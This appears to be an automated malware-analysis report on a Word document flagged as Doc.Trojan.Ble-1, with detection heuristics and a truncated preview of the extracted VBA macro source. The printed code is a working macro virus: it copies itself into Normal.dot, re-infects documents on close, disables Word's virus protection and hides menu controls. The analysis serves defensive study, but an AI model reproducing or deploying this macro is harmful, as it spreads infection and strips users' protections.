Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
The sample contains VBA macros, including AutoOpen and Auto_Close, which are commonly used to execute malicious code when a document is opened or closed. The script attempts to copy itself into the Normal.dot template, which is a persistence mechanism: every document subsequently created or opened from that template inherits the macro. The ClamAV detection name 'Doc.Trojan.Ble-1' together with the presence of AutoOpen/AutoClose macros strongly suggests a malicious document dropper.
Heuristics (5)

| Finding | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Trojan.Ble-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Trojan.Ble-1 |
| VBA macros detected (2 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| Auto_Close macro | high | OLE_VBA_AUTOCLOSE | Auto_Close macro |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32719 bytes | 9771ef415d803570a1bba5f1659be45a7b5e9d444d1545cd5b5b6831084bb085 |
Preview script: first 1,000 lines of the extracted script

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MacroBle"
Public myname$
Public Changed As Boolean
Public sz As Long
Public k As Long
Public NoSpecial As Boolean
Option Base 1
Dim ends$(2, 12)
Dim Moora1$(40)
Dim Moora2$(10)
Dim Bls$(3)
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "10.04.97 (c) Microsoft Corporation"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.MacroBle.AutoOpen"
On Error GoTo 1
myname$ = "MacroBle"
WordBasic.DisableAutoMacros 0
If Not CheckNormal Then
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:=myname$, Object:=wdOrganizerObjectProjectItems
Set mytemp = NormalTemplate.OpenAsDocument
mytemp.SaveAs (GetPath$ + "NORMAL1.DOT")
mytemp.Close SaveChanges:=wdSaveChanges
End If
GoTo 2
1:
'MsgBox "Fuck up !"
Resume 2
2:
RunOtherMacro MacN:="AutoOpen"
End Sub
Function CheckNormal()
cn = False
For Each x In NormalTemplate.VBProject.VBComponents
If x.Name = myname$ Then cn = True
Next
CheckNormal = cn
End Function
Sub RunOtherMacro(MacN As String)
On Error GoTo Run_Error
For Each Mac In ActiveDocument.VBProject.VBComponents
If (Mac.Type = 1) And (Mac.Name <> "MacroBle") Then
Application.Run "project." + Mac.Name + "." + MacN
Skip_Error:
End If
Next Mac
GoTo End_Run
Run_Error:
Resume Skip_Error
End_Run:
End Sub
Function CheckActive()
cn = False
For Each x In ActiveDocument.VBProject.VBComponents
If x.Name = myname$ Then cn = True
Next
CheckActive = cn
End Function
Sub AutoClose()
Attribute AutoClose.VB_Description = "10.04.97 (c) Microsoft Corporation"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.MacroBle.AutoClose"
On Error GoTo errorlevel2
If Not CheckActive Then Application.OrganizerCopy Source:=GetPath$ + "NORMAL1.DOT", Destination:=ActiveDocument.FullName, Name:=myname$, Object:=wdOrganizerObjectProjectItems
If MyDate Then Optimize
GoTo end_f
errorlevel2:
'MsgBox "More Errors !"
Resume end_f
end_f:
RunOtherMacro MacN:="AutoClose"
End Sub
Function GetPath$()
s$ = NormalTemplate.FullName
s$ = Mid$(s$, 1, Len(s$) - 10)
GetPath$ = s$
End Function
Sub AutoExec()
Attribute AutoExec.VB_Description = "10.04.97 (c) Microsoft Corporation"
Attribute AutoExec.VB_ProcData.VB_Invoke_Func = "Project.MacroBle.AutoExec"
Options.VirusProtection = False
Set x = CommandBars("Tools").Controls(12)
x.Visible = False
x.Enabled = False
ends$(1, 1) = "ûé"
ends$(1, 2) = "îãî"
ends$(1, 3) = "îìó"
ends$(1, 4) = "ûì"
ends$(1, 5) = "îì"
ends$(1, 6) = "àÿ"
ends$(1, 7) = "îé"
ends$(1, 8) = "óþ"
ends$(1, 9) = "ûå"
ends$(1, 10) = "ûõ"
ends$(1, 11) = "ûìè"
ends$(1, 12) = "îå"
ends$(2, 1) = "èé"
ends$(2, 2) = "åãî"
ends$(2, 3) = "åìó"
ends$(2, 4) = "èì"
ends$(2, 5) = "åì"
ends$(2, 6) = "åé"
ends$(2, 7) = "èå"
ends$(2, 8) = "èõ"
ends$(2, 9) = "èì"
ends$(2, 10) = "èìè"
ends$(2, 11) = "åå"
ends$(2, 12) = "àÿ"
Moora1$(1) = "õóåâ"
Moora1$(2) = "åáàíóò"
Moora1$(3) = "ãîíèì"
Moora1$(4) = "äåáèëüí"
Moora1$(5) = "ìóäà÷í"
Moora1$(6) = "õðåíîâ"
Moora1$(7) = "äóáîâ"
Moora1$(8) = "ñîïëèâ"
Moora1$(9) = "êîðÿâ"
Moora1$(10) = "óáëþäî÷í"
Moora1$(11) = "ïåäðèëüí"
Moora1$(12) = "ãîâíÿí"
Moora1$(13) = "êîçëèí"
Moora1$(14) = "åáëèâ"
Moora1$(15) = "åáàí"
Moora1$(16) = "ïèçäàíóò"
Moora1$(17) = "ïðèäóðîøí"
Moora1$(18) = "øèçàíóò"
Moora1$(19) = "ãíóñí"
Moora1$(20) = "ñòðåìí"
Moora1$(21) = "ãíóñàâ"
Moora1$(22) = "òóïîðûë"
Moora1$(23) = "êàíàëèçàöèîíí"
Moora1$(24) = "âèçãëèâ"
Moora1$(25) = "ñëåïîøàð"
Moora1$(26) = "ïðûùàâ"
Moora1$(27) = "ðâîòí"
Moora1$(28) = "ñêëî÷í"
Moora1$(29) = "óðîäëèâ"
Moora1$(30) = "áîðîäàâî÷í"
Moora1$(31) = "îáñòðóõàíí"
Moora1$(32) = "íåíîðìàëüí"
Moora1$(33) = "ïëþãàâ
```

... (truncated)